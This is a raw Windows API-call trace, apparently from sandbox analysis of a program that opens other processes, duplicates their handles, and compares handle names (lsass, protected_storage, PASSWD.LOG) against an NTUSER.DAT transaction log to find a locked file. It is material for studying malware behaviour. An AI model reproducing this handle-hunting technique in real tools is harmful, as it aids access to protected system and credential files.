[0152.498] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x1ac) returned 0x62c [0152.498] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x154, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0152.498] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0152.499] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0152.500] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0152.500] CloseHandle (hObject=0x670) returned 1 [0152.500] CloseHandle (hObject=0x680) returned 1 [0152.500] CloseHandle (hObject=0x62c) returned 1 [0152.500] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x1d8) returned 0x62c [0152.500] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0xc, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0152.500] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0152.501] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0152.501] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0152.501] CloseHandle (hObject=0x670) returned 1 [0152.501] _wcsicmp (_Str1="\\System32", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned 5 [0152.501] CloseHandle (hObject=0x680) returned 1 [0152.502] CloseHandle (hObject=0x62c) returned 1 [0152.502] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x1d8) returned 0x62c [0152.502] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0xec, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0152.502] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0152.502] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0152.503] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0152.503] CloseHandle (hObject=0x670) returned 1 [0152.503] _wcsicmp (_Str1="\\ntsvcs", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned -2 [0152.503] CloseHandle (hObject=0x680) returned 1 [0152.503] CloseHandle (hObject=0x62c) returned 1 [0152.503] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x1d8) returned 0x62c [0152.503] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0xf0, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0152.503] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0152.504] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0152.505] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0152.505] CloseHandle (hObject=0x670) returned 1 [0152.505] _wcsicmp (_Str1="\\ntsvcs", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned -2 [0152.505] CloseHandle (hObject=0x680) returned 1 [0152.505] CloseHandle (hObject=0x62c) returned 1 [0152.505] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x1d8) returned 0x62c [0152.505] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0xf4, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0152.505] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0152.509] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0152.511] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0152.511] CloseHandle (hObject=0x670) returned 1 [0152.511] _wcsicmp (_Str1="\\ntsvcs", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned -2 [0152.511] CloseHandle (hObject=0x680) returned 1 [0152.511] CloseHandle (hObject=0x62c) returned 1 [0152.511] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x1d8) returned 0x62c [0152.511] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0xf8, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0152.511] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0152.512] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0152.512] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0152.512] CloseHandle (hObject=0x670) returned 1 [0152.513] CloseHandle (hObject=0x680) returned 1 [0152.513] CloseHandle (hObject=0x62c) returned 1 [0152.513] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x1d8) returned 0x62c [0152.513] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x104, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0152.513] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0152.513] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0152.514] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0152.514] CloseHandle (hObject=0x670) returned 1 [0152.514] _wcsicmp (_Str1="\\scerpc", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned 5 [0152.514] CloseHandle (hObject=0x680) returned 1 [0152.514] CloseHandle (hObject=0x62c) returned 1 [0152.514] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x1d8) returned 0x62c [0152.514] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x108, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0152.514] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0152.515] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0152.517] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0152.517] CloseHandle (hObject=0x670) returned 1 [0152.517] _wcsicmp (_Str1="\\scerpc", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned 5 [0152.517] CloseHandle (hObject=0x680) returned 1 [0152.517] CloseHandle (hObject=0x62c) returned 1 [0152.517] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x1d8) returned 0x62c [0152.517] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x10c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0152.517] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0152.518] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0152.518] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0152.518] CloseHandle (hObject=0x670) returned 1 [0152.519] _wcsicmp (_Str1="\\scerpc", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned 5 [0152.519] CloseHandle (hObject=0x680) returned 1 [0152.519] CloseHandle (hObject=0x62c) returned 1 [0152.519] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x1d8) returned 0x62c [0152.519] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x2d4, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0152.519] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0152.520] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0152.521] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0152.521] CloseHandle (hObject=0x670) returned 1 [0152.521] CloseHandle (hObject=0x680) returned 1 [0152.521] CloseHandle (hObject=0x62c) returned 1 [0152.521] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x1d8) returned 0x62c [0152.521] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x2d8, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0152.521] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0152.522] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0152.523] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0152.523] CloseHandle (hObject=0x670) returned 1 [0152.523] CloseHandle (hObject=0x680) returned 1 [0152.523] CloseHandle (hObject=0x62c) returned 1 [0152.523] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x1d8) returned 0x62c [0152.523] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x2dc, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0152.523] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0152.524] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0152.525] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0152.525] CloseHandle (hObject=0x670) returned 1 [0152.525] _wcsicmp (_Str1="\\CatalogChangeListener-1d8-0", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned -11 [0152.525] CloseHandle (hObject=0x680) returned 1 [0152.525] CloseHandle (hObject=0x62c) returned 1 [0152.525] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x1d8) returned 0x62c [0152.525] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x2e8, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0152.525] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0152.526] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0152.526] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0152.526] CloseHandle (hObject=0x670) returned 1 [0152.526] CloseHandle (hObject=0x680) returned 1 [0152.527] CloseHandle (hObject=0x62c) returned 1 [0152.527] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x1d8) returned 0x62c [0152.527] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x2ec, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0152.527] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0152.527] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0152.528] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0152.528] CloseHandle (hObject=0x670) returned 1 [0152.528] CloseHandle (hObject=0x680) returned 1 [0152.528] CloseHandle (hObject=0x62c) returned 1 [0152.528] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x1d8) returned 0x62c [0152.528] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x33c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0152.528] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0152.529] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0152.529] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0152.529] CloseHandle (hObject=0x670) returned 1 [0152.529] _wcsicmp (_Str1="\\044a6734-e90e-4f8f-b357-b2dc8ab3b5ec", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned -62 [0152.529] CloseHandle (hObject=0x680) returned 1 [0152.530] CloseHandle (hObject=0x62c) returned 1 [0152.530] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x1e0) returned 0x62c [0152.530] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0xc, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0152.530] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0152.530] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0152.531] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0152.531] CloseHandle (hObject=0x670) returned 1 [0152.531] _wcsicmp (_Str1="\\System32", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned 5 [0152.531] CloseHandle (hObject=0x680) returned 1 [0152.531] CloseHandle (hObject=0x62c) returned 1 [0152.531] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x1e0) returned 0x62c [0152.531] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0xa0, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0152.531] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0152.532] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0152.533] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0152.533] CloseHandle (hObject=0x670) returned 1 [0152.533] CloseHandle (hObject=0x680) returned 1 [0152.533] CloseHandle (hObject=0x62c) returned 1 [0152.533] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x1e0) returned 0x62c [0152.533] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x1a0, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0152.533] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0152.534] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0152.534] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0152.535] CloseHandle (hObject=0x670) returned 1 [0152.535] CloseHandle (hObject=0x680) returned 1 [0152.535] CloseHandle (hObject=0x62c) returned 1 [0152.535] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x1e0) returned 0x62c [0152.535] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x2a0, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0152.535] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0152.535] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0152.536] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0152.536] CloseHandle (hObject=0x670) returned 1 [0152.536] _wcsicmp (_Str1="\\PASSWD.LOG", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned 2 [0152.536] CloseHandle (hObject=0x680) returned 1 [0152.536] CloseHandle (hObject=0x62c) returned 1 [0152.536] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x1e0) returned 0x62c [0152.536] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x354, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0152.536] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0152.537] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0152.537] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0152.538] CloseHandle (hObject=0x670) returned 1 [0152.538] CloseHandle (hObject=0x680) returned 1 [0152.538] CloseHandle (hObject=0x62c) returned 1 [0152.538] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x1e0) returned 0x62c [0152.538] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x358, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0152.538] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0152.538] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0152.539] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0152.539] CloseHandle (hObject=0x670) returned 1 [0152.539] _wcsicmp (_Str1="\\lsass", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned -2 [0152.539] CloseHandle (hObject=0x680) returned 1 [0152.539] CloseHandle (hObject=0x62c) returned 1 [0152.539] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x1e0) returned 0x62c [0152.539] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x360, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0152.539] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0152.540] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0152.541] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0152.541] CloseHandle (hObject=0x670) returned 1 [0152.541] _wcsicmp (_Str1="\\lsass", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned -2 [0152.541] CloseHandle (hObject=0x680) returned 1 [0152.541] CloseHandle (hObject=0x62c) returned 1 [0152.541] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x1e0) returned 0x62c [0152.541] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x390, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0152.541] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0152.542] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0152.542] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0152.542] CloseHandle (hObject=0x670) returned 1 [0152.542] CloseHandle (hObject=0x680) returned 1 [0152.542] CloseHandle (hObject=0x62c) returned 1 [0152.542] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x1e0) returned 0x62c [0152.542] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x3c0, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0152.543] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0152.543] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0152.544] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0152.544] CloseHandle (hObject=0x670) returned 1 [0152.544] _wcsicmp (_Str1="\\protected_storage", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned 2 [0152.544] CloseHandle (hObject=0x680) returned 1 [0152.544] CloseHandle (hObject=0x62c) returned 1 [0152.544] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x1e0) returned 0x62c [0152.544] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x3c4, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0152.544] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0152.545] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0152.546] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0152.546] CloseHandle (hObject=0x670) returned 1 [0152.546] _wcsicmp (_Str1="\\protected_storage", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned 2 [0152.546] CloseHandle (hObject=0x680) returned 1 [0152.546] CloseHandle (hObject=0x62c) returned 1 [0152.546] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x1e0) returned 0x62c [0152.546] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x3c8, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0152.546] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0152.547] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0152.547] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0152.547] CloseHandle (hObject=0x670) returned 1 [0152.547] _wcsicmp (_Str1="\\protected_storage", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned 2 [0152.548] CloseHandle (hObject=0x680) returned 1 [0152.548] CloseHandle (hObject=0x62c) returned 1 [0152.548] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x1e0) returned 0x62c [0152.548] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x550, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0152.548] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0152.548] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0152.549] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0152.549] CloseHandle (hObject=0x670) returned 1 [0152.549] _wcsicmp (_Str1="\\lsass", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned -2 [0152.549] CloseHandle (hObject=0x680) returned 1 [0152.549] CloseHandle (hObject=0x62c) returned 1 [0152.549] OpenProcess 